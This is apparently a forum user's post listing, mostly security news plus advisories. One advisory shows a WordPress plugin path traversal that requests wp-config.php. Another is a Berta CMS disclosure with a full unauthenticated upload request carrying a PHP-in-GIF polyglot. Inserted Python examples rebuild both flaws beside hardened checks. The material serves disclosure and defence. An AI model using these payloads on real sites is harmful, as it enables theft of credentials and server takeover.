Aerosol

Everything posted by Aerosol

  1. Yahoo received nearly 5,000 requests for user data from the United States government in the last six months of 2014 and disclosed some content in nearly 25 percent of those cases. The company said in its new transparency report that it received between 0-999 National Security Letters from the U.S. government, too. The latest report from Yahoo on government requests covers the period of July through December of 2014 and the company reported 4,865 total requests from the U.S. during that period. Those requests covered a total of 9,752 user accounts and the company disclosed some content in 1,157 of those cases. Yahoo rejected 258 of the U.S. government’s requests and disclosed solely non-content data in 2,887 cases. Yahoo defines non-content data as “the information captured at the time of registration such as an alternate e-mail address, name, location, and IP address, login details, billing information, and other transactional information”. The U.S. was by far the most active government in this report, with Taiwan coming in a distant second with 2,081 total requests. Germany sent 1,910 requests to Yahoo and the United Kingdom sent 1,570. In the previous six months, the U.S. sent 6,791 total requests to Yahoo and the company reported the same range of NSLs, 0-999. The government only allows companies to report the number of NSLs they receive in bands of 1,000. Yahoo and other technology companies have been pressuring the government for the ability to report those letters in more specific detail. In addition to the transparency data, Yahoo also provided an update on its efforts to protect users from attacks by governments and other attackers. “We’ve encrypted many of our most important products and services to protect against snooping by governments or other actors. 
This includes encryption of the traffic moving between Yahoo data centers; making browsing over HTTPS the default on Yahoo Mail and Yahoo Homepage; and implementing the latest in security best-practices, including supporting TLS 1.2, Perfect Forward Secrecy and a 2048-bit RSA key for many of our global properties such as Homepage, Mail and Digital Magazines. We’ve also rolled out an end-to-end (e2e) encryption extension for Yahoo Mail, now available on GitHub. Our goal is to provide an intuitive e2e encryption solution for all of our users by the end of 2015,” the company said in the report. Yahoo released the end-to-end encryption extension last week, something that was the result of an effort that Alex Stamos, the company’s CISO, announced at Black Hat last year. “Just a few years ago, e2e encryption was not widely discussed, nor widely understood. Today, our users are much more conscious of the need to stay secure online,” Stamos wrote on Yahoo’s Tumblr. He said that Yahoo’s extension will satisfy users’ needs to share sensitive information securely. “Wherever you land on the spectrum, we’ve heard you loud and clear: We’re building the best products to ensure a more secure user experience and overall digital ecosystem.” Yahoo, like its counterparts at Google, has been investing in encrypting more and more of its services and infrastructure. Much of this has come in the wake of the Edward Snowden revelations, but some of the efforts were in motion before the leaks about NSA capabilities against the companies’ services began to surface. Source
  2. GE has released a fix for a vulnerability in a library that’s used in several of its products deployed in critical infrastructure areas. The flaw in the HART Device Type Manager library could allow an attacker to crash affected applications or run arbitrary code. The vulnerability in the DTM library affects four of GE’s products, as well as one product manufactured by MACTek. According to an advisory from ICS-CERT, GE has released an updated library that addresses the problem. “The vulnerability causes a buffer overflow in the HART Device DTM crashing the Field Device Tool (FDT) Frame Application. The Frame Application must then be restarted. The Frame Application is primarily used for remote configuration. Exploitation of this vulnerability does not result in loss of information, control, or view by the control system of the HART devices on the 4-20 mA HART Loop,” the advisory says. “The buffer overflow exploited could be used to execute arbitrary code on the system running the Frame Application. The researcher has provided proof of concept to ICS-CERT and the vendor. The updated HART Device DTM provided by GE and MACTek will resolve this issue. Successful exploitation requires that the Frame Application is running and connected to a DTM-configured HART-based device at the time of the exploit.” The new library that fixes the vulnerability is available from both GE and MACTek. The affected products are: MACTek’s Bullet DTM 1.00.0, GE’s Vector DTM 1.00.0, GE’s SVi1000 Positioner DTM 1.00.0, GE’s SVI II AP Positioner DTM 2.00.1, and GE’s 12400 Level Transmitter DTM 1.00.0. Until customers have patched their affected products, ICS-CERT recommends some additional mitigations. “Device DTM software with the identified vulnerable versions listed as impacted should be used only within an offline secure network until patched. 
ICS-CERT strongly recommends performing configuration changes in a nonproduction environment where proper testing and risk evaluation can be performed. ICS-CERT also recommends that asset owners employ a least privilege practice and avoid unnecessary services within their production environment,” the advisory says. Source
  3. A default setting in both Windows 7 and 8.1 could allow local users to elevate privileges and in some situations, escape application sandboxes. The issue, something that leaves all current Windows client installations vulnerable, lies in the way the operating system handles authentication. In some instances it could be possible for a user to use a reflection attack in NT LAN Manager, a collection of security protocols found in Windows systems, to leverage WebDAV (Web Distributed Authoring and Versioning) and carry out an attack. “It’s possible to abuse cross-protocol NTLM reflection to attack the local SMB server by forcing a local system process to access a WebDAV UNC path,” warned James Forshaw, the Google Project Zero security researcher who found the issue, on Monday. Forshaw discovered the issue last year and reported it to Microsoft’s Security Response Center on Dec. 18 but the time that Project Zero gives to vendors to fix bugs – 90 days – elapsed last week, so the Google Security Research post and its proof of concept were opened to the public. According to Microsoft however the issue doesn’t merit a fix as the company has implemented mitigations for it, like Extended Protection for Authentication, in the past. According to Forshaw’s disclosure timeline, the company informed him in January that undoing the mitigations could cause “application compatibility concerns.” When reached Wednesday a Microsoft spokesperson confirmed that users should implement EPA to avoid reflection attacks using the NTLM as a vector. “Extended Protection for Authentication (EPA) is a security feature built-in to Windows 8 and 8.1, and available for older versions of Windows via knowledge base article 2345886, that helps protect our customers against this technique. 
We encourage customers to follow the guidance outlined in the article to enable EPA, which is off by default as it may cause some application compatibility concerns.” As EPA doesn’t come enabled by default, however, Forshaw is stressing that users looking to avoid reflection attacks should follow a different set of precautions, including enabling SMB signing or enabling SMB Server SPN verification. Forshaw points out that users can also disable the WebClient service, something that would make it trickier to elevate to local system, but that this wouldn’t prevent attacks like sandbox escapes, which require only user-level permissions. It also might be possible to stage the exploit in another fashion, including via a DCE/RPC call. As Forshaw acknowledges in his write-up, this is far from a new issue for Microsoft – the company actually addressed a similar issue back in 2008 (MS08-068) that could have let attackers use NTLM to mirror authentication from one machine back to the same machine. The patch disallowed NTLM sessions in flight but failed to address cross-protocol attacks like the one Project Zero found. Source
  4. A group of technology companies, non-profits and privacy and human rights organizations have sent a letter to President Barack Obama, the director of national intelligence and a wide range of Congressional leaders, calling for an end to the bulk collection of phone metadata under Section 215 of the USA PATRIOT Act. The letter, sent by dozens of organizations and companies, comes at a time when legislators in the United States are considering a new bill that would repeal the Patriot Act altogether. That measure likely will face stiff opposition in the House of Representatives, but less-sweeping reforms may be on the table as well. In the letter, representatives from the EFF, CloudFlare, Silent Circle, the ACLU, Mozilla, Human Rights Watch and many other organizations say that whatever form the changes take, Section 215 collection needs to end once and for all. “There must be a clear, strong, and effective end to bulk collection practices under the USA PATRIOT Act, including under the Section 215 records authority and the Section 214 authority regarding pen registers and trap & trace devices. Any collection that does occur under those authorities should have appropriate safeguards in place to protect privacy and users’ rights,” the letter says. The legal authority for the National Security Agency’s bulk collection of telephone metadata derives from Section 215 of the Patriot Act, and that section is due to expire on June 1. Lawmakers are considering a variety of possible reforms to the authority, but many in the security, technology and privacy communities have been advocating for the elimination of that authority altogether. In 2014, President Obama released a plan that would change the bulk collection under Section 215 and would keep all of the records with the telecom providers. The government would then need to get orders from the Foreign Intelligence Surveillance Court in order to access specific records. 
In addition to calling for an end to the Section 215 bulk collection, the organizations that sent the new letter to Obama and lawmakers said that any bill must “contain transparency and accountability mechanisms for both government and company reporting, as well as an appropriate declassification regime for Foreign Intelligence Surveillance Court decisions.” The Section 215 bulk collection was the first piece of the massive surveillance revelations from Edward Snowden that began in 2013. Though many other NSA programs have been revealed in the ensuing two years, the telephone metadata collection has remained one of the more controversial ones. “It has been nearly two years since the first news stories revealed the scope of the United States’ surveillance and bulk collection activities. Now is the time to take on meaningful legislative reforms to the nation’s surveillance programs that maintain national security while preserving privacy, transparency, and accountability. We strongly encourage both the White House and Members of Congress to support the above reforms and oppose any efforts to enact any legislation that does not address them,” the letter says. Source
  5. Google is continuing to refine its Safe Browsing API and now is giving users warnings about not just malicious software on sites they’re attempting to visit, but also about unwanted software. Google’s Safe Browsing API is designed to help protect users from a variety of threats on pages across the Internet. The functionality is built into Chrome, as well as Firefox and other browsers, and when a user tries to visit a page that Google’s crawlers or other users have reported to be hosting malware, phishing links or other types of threats, it will throw up a warning dialog. Depending upon the type of threat found on the target page, the browser will give the user various types of information and options. Google started showing Chrome users warnings about deceptive or unwanted software last month, but now that information will be fed into the Safe Browsing API so that other browser vendors, as well as app developers, can pull it into their offerings. “In addition to our constantly-updated malware and phishing data, our unwanted software data is now publicly available for developers to integrate into their own security measures. For example, any app that wants to save its users from winding up on sites that lead to deceptive software could use our API to do precisely that,” Emily Schechter, safe browsing program manager at Google, said in a blog post. “We continue to integrate Safe Browsing technology across Google—in Chrome, Google Analytics, and more—to protect users.” Deceptive, or unwanted, software is a fairly broad category of applications that includes things such as browser extensions that change your home page or modify the settings in your browser. These applications sometimes are bundled with other software or downloaded in the background, sometimes without a user’s knowledge. They can also include spyware or adware that collect users’ data and pretend to be something other than what they really are. 
Google defines deceptive software broadly as “programs disguised as a helpful download that actually make unexpected changes to your computer”. Image from Flickr photos of Parkesmj. Source
  6. https://rstforums.com/forum/reverse-engineering-and-exploit-development.rst And Exploits & PoCs.
  7. Exploit Title: WordPress Aspose-Cloud-eBook-Generator Plugin Arbitrary File Download Vulnerability
     Exploit Author: Ashiyane Digital Security Team
     Vendor Homepage: https://wordpress.org/plugins/aspose-cloud-ebook-generator/
     Download Link: https://downloads.wordpress.org/plugin/aspose-cloud-ebook-generator.zip
     Tested on: Windows, Linux
     Discovered By: ACC3SS

     Exploit:
     Vulnerable file: http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php

     Vulnerable code:

         <?php
         // The path comes straight from the query string and is never validated.
         $file = $_GET['file'];
         $file_arr = explode('/', $file);
         // Only the last path segment is used, and only for the download file name.
         $file_name = $file_arr[count($file_arr) - 1];
         header("Content-type: octet/stream");
         header("Content-disposition: attachment; filename=" . $file_name . ";");
         header("Content-Length: " . filesize($file));
         // The raw, attacker-controlled path is read: any file the web server can open is served.
         readfile($file);
         exit;
         ?>

     Request: http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=[File Address]

     Example: http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php

     Source
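As an added example (not part of the advisory, and not the plugin's own PHP), the same unchecked parameter reproduced in Python beside a hardened resolver, run against a WordPress tree constructed in a temporary directory. The "exports" folder name, the file contents and the assumption that PHP's working directory is the plugin directory are all made up for the demo:

```python
"""Added example (Python, not the plugin's PHP): the unchecked 'file' parameter
from aspose_posts_exporter_download.php next to a hardened path check.
The WordPress tree below is constructed in a temp directory for the demo."""
import os
import tempfile
from typing import Optional


def vulnerable_resolve(file_param: str, cwd: str) -> str:
    """What readfile($_GET['file']) does: no validation at all.  A relative
    path is resolved against PHP's working directory, an absolute one is
    used as given, and '..' segments are honoured."""
    return os.path.normpath(os.path.join(cwd, file_param))


def safe_resolve(file_param: str, base_dir: str) -> Optional[str]:
    """Return the real path of file_param only if it is a regular file inside
    base_dir; otherwise None.  realpath() collapses '..' and follows symlinks,
    so a link planted inside base_dir that points outside is rejected too."""
    if not file_param or "\x00" in file_param or os.path.isabs(file_param):
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, file_param))
    try:
        if os.path.commonpath([base, target]) != base:
            return None
    except ValueError:          # different drives on Windows
        return None
    return target if os.path.isfile(target) else None


def build_demo_site() -> tuple:
    """Constructed layout: a WordPress root with wp-config.php and the plugin
    directory with an 'exports' folder (assumed name) holding generated ebooks."""
    root = tempfile.mkdtemp(prefix="wp_demo_")
    plugin_dir = os.path.join(root, "wp-content", "plugins",
                              "aspose-cloud-ebook-generator")
    export_dir = os.path.join(plugin_dir, "exports")
    os.makedirs(export_dir)
    with open(os.path.join(root, "wp-config.php"), "w") as fh:
        fh.write("<?php define('DB_PASSWORD', 'constructed-secret');\n")
    with open(os.path.join(export_dir, "post-1.epub"), "wb") as fh:
        fh.write(b"PK\x03\x04 constructed ebook")
    return root, plugin_dir, export_dir


def demo() -> dict:
    """Run the advisory's payload through both resolvers; every value is True."""
    root, plugin_dir, export_dir = build_demo_site()
    traversal = "../../../wp-config.php"      # the advisory's example payload
    absolute = os.path.join(root, "wp-config.php")
    return {
        # the plugin, run from its own directory, happily serves wp-config.php
        "vulnerable_reads_config": os.path.isfile(vulnerable_resolve(traversal, plugin_dir)),
        "vulnerable_reads_absolute": os.path.isfile(vulnerable_resolve(absolute, plugin_dir)),
        # the hardened resolver keeps every request inside the export directory
        "safe_blocks_traversal": safe_resolve(traversal, export_dir) is None,
        "safe_blocks_absolute": safe_resolve(absolute, export_dir) is None,
        "safe_blocks_null_byte": safe_resolve("post-1.epub\x00.txt", export_dir) is None,
        "safe_allows_export": safe_resolve("post-1.epub", export_dir) is not None,
    }


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check:28s} {'PASS' if ok else 'FAIL'}")
```

The check is the path, not the name: stripping "../" from the parameter is not enough, because the plugin already does something similar for the display name while still reading the raw path, and encoded or doubled sequences survive naive filtering. Resolving to a real path and comparing against the real base directory is the test that holds up.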
  8. Berta CMS is a web based content management system using PHP and local file storage. http://www.berta.me/ After a third-party Berta CMS website being used to redirect links within a phishing email was brought to our attention, we checked the file upload functionality of this software. We found that the file upload didn't require authentication. Images with a ".php" extension could be uploaded, and all that was required is that they pass the PHP getimagesize() function and have suitable dimensions. It is possible for GIF image files (and possibly other image files - not tested) to contain arbitrary PHP whilst being well enough formed to pass the getimagesize() function with acceptable dimensions. http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/ We can't ascertain if this is the weakness that was used to compromise the 3rd party server in question; however, the patch requires authentication for all file uploads, which will likely resolve any similar issues. The author was notified: 2015-03-22. Author acknowledged: 2015-03-23. Patch released: 2015-03-26. The berta-0.8.10b.zip file from http://www.berta.me/download/ includes a fix that requires authentication to upload files. This announcement should not be interpreted as implying that either the author or Surevine have conducted any in-depth assessment of the suitability of Berta CMS for any purpose (sometimes you just want to make life harder for those sending phishing emails). The following POST request will upload a c.php file which will run phpinfo() when fetched on vulnerable servers. 
     POST /engine/upload.php?entry=true&mediafolder=.all HTTP/1.1
     Host: 192.168.56.101
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Referer: http://192.168.56.101/upload.html
     Connection: keep-alive
     Content-Type: multipart/form-data; boundary=---------------------------2147563051636691175750543802
     Content-Length: 1617

     -----------------------------2147563051636691175750543802
     Content-Disposition: form-data; name="Filedata"; filename="c.php"
     Content-Type: text/php

     GIF89/* < ³ ÿÿÿfffÌÌÌ333Ìÿÿ™™™3ffÌÌÿÌÿÌ™™Ìf3f 33 f™™3 3 3!þ GIF SmartSaver Ver1.1a , È < þ ÈI«½8ëÍ»ÿ`(Ždižhª®lë¾p,Ïtmßx®ï|ïÿÀ p¸ Ȥr™$ö˜ 4ê¬Z¯Õ cËíz¿`n { „ 2-xLn»ßé³|Î`« ¼^O6‡ãkp‚ƒ„#jtˆ]v)~`}g€_‹…”••‡‰‰“' _ 1˜Š–¤¥‚¢™s›& ^ŸŽ¡a«¦´µ?¨©g³$*]¯ž± ¶ÃÄ<¸¹Âw X½\‘^»ÅÒÓ+ÇÈÐ,Í[Ô%ÇÑÜàá)ÖßÙËâ Þèëì'äeç MÌJ êíøùöº x{{ üý P€‚64 ðVpÃ@> 8PƒÄ3 R±pOŸÇ þ ÞU8˜!@˜ (SbL9 a “š6Z8·° É 03 )¡#ÈŸøD Œ÷òäµI ¬ qY RN›D $½Æ€§O XÅ p §Qd‹ P*s c˜® &’y5«Ûi[ÓF ð´‹R~ ÄŽ%Û4 Z {· Ðö*a[q¥Î•P—Ë]Yy o™„mc/*ål,|¸3©Ä )\fðX˜d.L+Ç“Ã Àh¾ 8{žM ôb×'‡‚**GãEŒ Tï>غgnãÉh+/d{·…у¹FU;ñ9ë ‰Xv} A/¬Ø —‹ Ôü»u0Ñå:g Ãëôªxv-À’嬮²Çë'R ˜Wôº™þ' f XCÅuýÜÆ ~áíç ý¹âÞqê xÐ7Þ}ÑP{ ®ç Ö„Ôàƒ$ ¡/ (Ýz zQÜLááÕ¡€ ý6‡ˆÉ•¨c ':“â é)¶ w Ý <*H£A5å‚£$;FÉ£ŒJúw Z žŠ -ƒ$ ¡Iõ "Ob#å™8ô¸Í ˜e)a™vu@ä— „6f"pŠ æž5¨‰Ð XVù&r v 3jy'ž„šÉç£/øY …B h¤œ^ž f<‹’FP‹(n %¤¤² )›q *{\j0§¦už *f;©ê£¨Ž–ª« § Ú¦*kÒ¥`ž‚ k¢oZÓ ²¡þæ·ë³ ôzå¯ j9ë /º9*/<?php phpinfo(); ?>/* `ÇŽ´Ìµ°U .±áBkî>#VëE’ ¦ªîª• Šj v«* £í ¹åœë/®¹¾‹ Æ;h»6 D ·`°k0ŠÇ H¡³ÿú› ÃòN n Äñf/¹¤a÷±ÀkFÜ ‡ WlîÅÊÊ4f c¶Q s´6 ¢ˆz Ê1/RǯÊ@Wpñ ™É ³&¸ *Ç]Aæ|ñ n± O ôÕ o+îi!
     † ¥!"“ÓÀ"4õ ¥—2Ö¤^ óX0wʆZ™´F6É rÝuÖV³*²Û Ò óÔzâ Hqw?|kà‚ÿìwÅnóýUÆ’k*øá‡e |ùŸ•£7šã [L%G‚ãA©á}‹–Ku™7¼éza q- k‡Žf䬆·¯¯£ŽÔé² $nç Àk vº¶'o D(åá°< éQ€ `£` q}FÙ*ïý÷à‡/þøä—oþù觯þúì·ïþûðÇ/ÿüô×oÿýøç¯ÿþü÷ïÿÿ ;
     -----------------------------2147563051636691175750543802
     Content-Disposition: form-data; name="submit"

     Upload Image
     -----------------------------2147563051636691175750543802--

     Simon Waters
     phone +448454681066
     email simon.waters@surevine.com
     skype simon.waters.surevine
     Participate | Collaborate | Innovate
     Surevine Limited
     Source
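The following is an added example, not code from the advisory or from Berta CMS. It constructs a small GIF carrying the same phpinfo() payload in a GIF comment extension (a different placement than the request above, which splices it into the image data, but the same idea: decoders skip the bytes, the PHP engine does not), shows that a header-only dimension check in the style of getimagesize() accepts it, and then applies the kind of gate the 0.8.10b patch adds. The upload_allowed policy (authentication required, a .gif-only allowlist and a 4000-pixel bound) is an assumption for the demo, not Berta's code:

```python
"""Added example (Python, not Berta's code or Surevine's advisory): build a GIF
that is a valid image *and* contains a PHP payload, show that a header-only
dimension check like getimagesize() accepts it, and gate the upload the way
the patch does.  All bytes are constructed here; the payload is inert text."""
import os
import struct

PHP_PAYLOAD = b"<?php phpinfo(); ?>"     # same call the advisory's c.php makes


def gif_comment_extension(payload: bytes) -> bytes:
    """GIF89a Comment Extension: 0x21 0xFE, data sub-blocks of <=255 bytes
    each prefixed with its length, then a 0x00 block terminator.  Decoders
    skip it; the PHP engine does not, it scans the whole file for '<?php'."""
    out = bytearray(b"\x21\xFE")
    for i in range(0, len(payload), 255):
        chunk = payload[i:i + 255]
        out += bytes([len(chunk)]) + chunk
    out += b"\x00"
    return bytes(out)


def build_polyglot_gif(payload: bytes = PHP_PAYLOAD, width: int = 1, height: int = 1) -> bytes:
    """Smallest well-formed GIF89a (2-colour global table, one black pixel)
    with the payload parked in a comment extension before the image data."""
    screen = b"GIF89a" + struct.pack("<HH", width, height) + b"\x80\x00\x00"
    palette = b"\x00\x00\x00\xFF\xFF\xFF"
    image = (b"\x2C" + struct.pack("<HHHH", 0, 0, 1, 1) + b"\x00"   # image descriptor
             + b"\x02"                      # LZW minimum code size
             + b"\x02\x44\x01"              # one sub-block: clear, index 0, end-of-information
             + b"\x00")                     # block terminator
    return screen + palette + gif_comment_extension(payload) + image + b"\x3B"


def gif_dimensions(data: bytes):
    """Header-only check in the spirit of PHP's getimagesize(): (width, height)
    for anything carrying a GIF signature, None otherwise.  Nothing after byte 10
    is inspected, which is exactly why a polyglot passes."""
    if len(data) < 10 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return None
    return struct.unpack("<HH", data[6:10])


def upload_allowed(filename: str, data: bytes, authenticated: bool, max_side: int = 4000) -> bool:
    """Gate an upload should pass (assumed policy, only .gif shown): the caller is
    authenticated, as Berta 0.8.10b now requires; the extension is allowlisted so
    'c.php' can never be written; the magic bytes and dimensions are sane."""
    if not authenticated:
        return False
    if os.path.splitext(filename.lower())[1] != ".gif":
        return False
    dims = gif_dimensions(data)
    return dims is not None and 0 < dims[0] <= max_side and 0 < dims[1] <= max_side


if __name__ == "__main__":
    gif = build_polyglot_gif()
    print("dimensions:", gif_dimensions(gif), "payload embedded:", PHP_PAYLOAD in gif)
    print("c.php allowed:", upload_allowed("c.php", gif, True))
    print("c.gif allowed:", upload_allowed("c.gif", gif, True))
```

Note what the gate does and does not do: the same polyglot named c.gif is still accepted, because it is a valid image; the protection is that it is never written under an extension the server executes. Re-encoding uploads through an image library and storing them under a path where the web server does not run scripts are the stronger complements; the authentication requirement the patch adds removes the unauthenticated attacker entirely.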
  9. I haven't received it yet; when I get it I'll let you know, plus a photo.
  10. @askvrit And my name is Marius, most people know that. As for "vre-o", thanks for correcting me.
  11. I didn't bother taking a screenshot; I'll just post their reply. PM me if you want to know where it was and other details. 2x XSS and CSRF. Very decent people, the guys (and girls) replied quickly and in about 30 minutes everything was fixed.
  12. Initially identified fifteen years ago, and clearly articulated in a Microsoft Security Advisory, DLL hijacking is the practice of having a vulnerable application load a malicious library (allowing for the execution of arbitrary code) rather than the legitimate library, by placing it at a preferential location as dictated by the Dynamic-Link Library Search Order, a pre-defined standard for how Microsoft Windows searches for a DLL when the path has not been specified by the developer. Despite published advice on secure development practices to mitigate this threat having been available for several years, this still remains a problem today and is an ideal place for malicious code to hide and persist, as well as to take advantage of the security context of the loading program.

     How can DLL hijacking be detected?
     Okay, so it's up to the developers to be more secure in the way they load their libraries, but in the meanwhile how can we detect whether our systems have been compromised in this way? To achieve this I have been experimenting with a new methodology (well, at least it's new to me!) for detecting active attacks of this nature on vulnerable systems, and have written a program which does the following:
       1. Iterate through each running process on the system, identifying all the DLLs which they have loaded
       2. For each DLL, inspect all the locations where a malicious DLL could be placed
       3. If a DLL with the same name appears in multiple locations in the search order, perform an analysis based on which location is currently loaded and highlight the possibility of a hijack to the user
       4. Additionally: check each DLL to see whether it has been digitally signed, and give the user the option to ignore all signed DLLs

     During testing I have found that DLL hijacking isn't always malicious; in fact there are a whole bunch of digitally signed libraries which sit in the base directory of an application (perhaps they act differently to their generic counterparts?). Accordingly, in order to reduce the amount of noise returned by the tool, I implemented the '/unsigned' parameter, which I would recommend you use the first time you run it. This ignores cases where both the DLL which has actually been loaded and the others found in the search order are all signed (and therefore more likely to be legit). If you want to dig deep, feel free to leave this off!

     By default, the tool will only display the results where the library being examined was loaded from one of the 'DLL search order' paths, as otherwise it implies it was safely loaded from an alternative location. Unfortunately, this excludes the 'Current Working Directory' (due to a lack of an API to retrieve this data and undocumented internal memory structure changes between versions). If you want to override this you can, with the /verbose option (realistically, in conjunction with /unsigned to reduce the noise). This would be useful if you are looking for 'remote system, current working directory' style attacks, as this displays entries with multiple potential DLLs irrespective of where they were loaded from.

     Demonstration of tool in action
     To test the tool, I created a vulnerable executable which does a single action: LoadLibrary(L"dll_hijack_test_dll.dll");. This sits alongside the associated DLL which, on being loaded, writes a message to the screen and sleeps forever to keep the program running. I put the DLL in two locations on the system: the path to the executable, and the Windows System directory (C:\Windows\System32). This now represents a common DLL hijacking attack in which the attacker would place the malicious DLL in the directory the program is launched from, which would be searched before the Windows System directory (where, in this case, the legitimate DLL would be).

     [Image 1. The demo program running with the DLL loaded]
     The image above shows the demo running and the properties page from Process Hacker, which shows the DLL as being loaded. At this point we run dll_hijack_detect.exe, which produces the following result:
     [Image 2. Output from dll_hijack_detect.exe on demo system]
     [Video demonstration]
     As we can see, it has successfully identified the hijack and informed the user! Sounds great! Where can I download a copy? I have released the source code and binaries, all of which are available from my GitHub. In addition you will find a copy of the dll_hijack_test executable and DLL, so you can try it out for yourself! Source
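As an added illustration of steps 2 to 4 of the method above (this is not the author's dll_hijack_detect code), the search-order comparison written in Python and run over a directory tree constructed in a temporary folder. The module list, the search-order directories, the set of trusted system directories and the signature check are all passed in by the caller, where the real tool gets them from the Windows API and Authenticode. The file names and layout are constructed for the demo, and it goes one case beyond the post: a copy of a system DLL planted in a lower-priority directory, which is reported at "info" rather than "hijack" severity because the System32 copy still won:

```python
"""Added example (Python, not the dll_hijack_detect tool): the detection logic
from the post, steps 2-4, run over a constructed directory tree instead of live
processes.  Search-order directories, module list, trusted directories and
'signed' status are supplied by the caller; on a real system they come from
the Windows API."""
import os
import tempfile
from typing import Callable, Dict, Iterable, List, Tuple

# (dll name, path it was loaded from, same-named copies later in the order, severity)
Finding = Tuple[str, str, List[str], str]


def find_hijack_candidates(loaded_modules: Dict[str, str], search_order: List[str],
                           trusted_dirs: Iterable[str] = (),
                           is_signed: Callable[[str], bool] = lambda p: False,
                           ignore_all_signed: bool = False) -> List[Finding]:
    """For every loaded DLL, look for same-named files in each search-order
    directory.  If the loaded copy sits in a directory searched *before* another
    directory holding the same name, report it.  Loaded from an untrusted
    directory (e.g. the application directory) it is the classic hijack shape;
    loaded from a trusted one it is a planted copy that did not win.
    ignore_all_signed mimics the tool's /unsigned switch: drop a finding when the
    loaded DLL and every shadowed copy carry a valid signature."""
    def canon(p: str) -> str:
        return os.path.normcase(os.path.realpath(p))

    trusted = {canon(d) for d in trusted_dirs}
    findings: List[Finding] = []
    for name, loaded_path in loaded_modules.items():
        loaded_dir = canon(os.path.dirname(loaded_path))
        copies = [d for d in search_order if os.path.isfile(os.path.join(d, name))]
        if len(copies) < 2:
            continue                    # a single candidate: nothing to hijack
        canon_copies = [canon(d) for d in copies]
        if loaded_dir not in canon_copies:
            continue                    # loaded by full path outside the order (tool's default skips)
        shadowed = [os.path.join(d, name) for d in copies[canon_copies.index(loaded_dir) + 1:]]
        if not shadowed:
            continue                    # earlier copies lost out (KnownDLLs): not the search-order case
        if ignore_all_signed and is_signed(loaded_path) and all(is_signed(p) for p in shadowed):
            continue
        severity = "info" if loaded_dir in trusted else "hijack"
        findings.append((name, loaded_path, shadowed, severity))
    return findings


def build_demo() -> Tuple[List[str], Dict[str, str], str, str, str]:
    """Constructed tree mirroring the post's test: dll_hijack_test_dll.dll placed
    both next to the executable and in a fake System32, plus a version.dll
    planted in the working directory behind the real one."""
    root = tempfile.mkdtemp(prefix="dll_demo_")
    app_dir = os.path.join(root, "Program Files", "Demo")
    windows = os.path.join(root, "Windows")
    system32 = os.path.join(windows, "System32")
    cwd = os.path.join(root, "Users", "victim", "Downloads")
    for d in (app_dir, system32, cwd):
        os.makedirs(d)
    for d in (app_dir, system32):
        open(os.path.join(d, "dll_hijack_test_dll.dll"), "wb").close()
    open(os.path.join(system32, "kernel32.dll"), "wb").close()
    open(os.path.join(system32, "version.dll"), "wb").close()
    open(os.path.join(cwd, "version.dll"), "wb").close()          # planted copy
    # default order with SafeDllSearchMode on (16-bit system dir and PATH omitted)
    order = [app_dir, system32, windows, cwd]
    loaded = {
        "dll_hijack_test_dll.dll": os.path.join(app_dir, "dll_hijack_test_dll.dll"),
        "kernel32.dll": os.path.join(system32, "kernel32.dll"),
        "version.dll": os.path.join(system32, "version.dll"),
    }
    return order, loaded, app_dir, system32, windows


def demo() -> dict:
    """Run the comparison with and without the /unsigned-style filter."""
    order, loaded, app_dir, system32, windows = build_demo()
    trusted = {system32, windows}
    findings = find_hijack_candidates(loaded, order, trusted_dirs=trusted)
    quiet = find_hijack_candidates(loaded, order, trusted_dirs=trusted,
                                   is_signed=lambda p: True, ignore_all_signed=True)
    return {
        "severity_by_dll": {f[0]: f[3] for f in findings},
        "hijack_shadowed_in_system32": any(
            f[0] == "dll_hijack_test_dll.dll" and f[2][0].startswith(system32) for f in findings),
        "all_signed_suppressed": quiet == [],
    }


if __name__ == "__main__":
    for name, loaded_from, shadowed, severity in find_hijack_candidates(
            *build_demo()[:2], trusted_dirs=build_demo()[3:]):
        print(f"[{severity}] {name} loaded from {loaded_from}; also present at {shadowed}")
```

The signature filter is a noise reduction, not a verdict: a signed DLL in the application directory can still be the wrong one (an old, vulnerable build with a valid signature), so on a first pass use it, and on a suspect host review the full list.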
  13. Kansa

     A modular incident response framework in PowerShell. Note there's a bug that's currently cropping up on PowerShell version 2 systems, but version 3 and later should be fine.

     More info:
     trustedsignal -- blog: Kansa
     PowerShell Magazine » Kansa: A PowerShell-based incident response framework

     What does it do?
     It uses PowerShell Remoting to run user contributed, ahem, user contributed modules across hosts in an enterprise to collect data for use during incident response, breach hunts, or for building an environmental baseline.

     How do you use it?
     Here's a very simple command line example you can run on your own local host. After downloading the project and unzipping it, you'll likely need to "unblock" the ps1 files. The easiest way to do this if you're using PowerShell v3 or later is to cd to the directory where Kansa resides and do:

         ls -r *.ps1 | Unblock-File

     If you're not running PS v3 or later, Sysinternals' Streams utility can be used to remove the alternate data streams that PowerShell uses to determine if files came from the Internet. Once you've removed those ADSes, you'll be able to run the scripts without issue. I've not run into any issues running the downloaded scripts via Windows Remote Management / PowerShell Remoting through Kansa, so you shouldn't have to do anything if you want to run the scripts via remoting.

     Open an elevated PowerShell prompt (right-click, Run As Administrator). At the command prompt, enter:

         .\kansa.ps1 -Target localhost -ModulePath .\Modules -Verbose

     The script should start collecting data, or you may see an error about not having Windows Remote Management enabled. If so, do a little searching online; it's easy to turn on. Turn it on and try again.

     When it finishes running, you'll have a new Output_timestamp subdirectory, with subdirectories for data collected by each module. You can cd into those subdirectories and check out the data. There are some analysis scripts in the Analysis directory, but many of those won't make sense on a collection of data from a single host. Kansa was written for collection and analysis of data from dozens, hundreds, thousands, tens of thousands of systems.

     Running Modules Standalone
